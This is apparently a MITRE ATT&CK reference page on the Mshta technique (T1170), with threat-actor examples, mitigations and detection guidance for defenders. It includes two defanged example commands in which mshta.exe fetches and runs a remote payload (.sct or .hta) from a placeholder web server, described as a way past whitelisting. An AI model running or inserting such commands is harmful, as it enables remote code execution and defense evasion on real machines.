The sub-techniques beta is now live! Read the release blog post for more info.


Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. [1] HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. [2]

Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code [3] [4] [5] [6] [7]

Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))

They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta

Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. [8]

ID: T1170
Tactic: Defense Evasion, Execution
Platform: Windows
Permissions Required: User
Data Sources: Process monitoring, Process command-line parameters
Defense Bypassed: Application whitelisting, Digital Certificate Validation
Contributors: Ricardo Dias; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
Version: 1.2
Created: 16 January 2018
Last Modified: 11 September 2019

Procedure Examples

Name Description

APT32 has used mshta.exe for code execution.[14][15]


FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.[7]


Kimsuky has used mshta to run malicious scripts on the system.[17]


Koadic can use MSHTA to serve additional payloads.[9]


MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.[11][16]


NanHaiShu uses mshta.exe to load its program and files.[10]


POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts.[11]

Revenge RAT

Revenge RAT uses mshta.exe to run malicious scripts on the system.[13]


Xbash can use mshta for executing scripts.[12]


Mitigation Description
Disable or Remove Feature or Program

Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life.

Execution Prevention

Use application whitelisting configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.


Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the binary being executed.

Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious.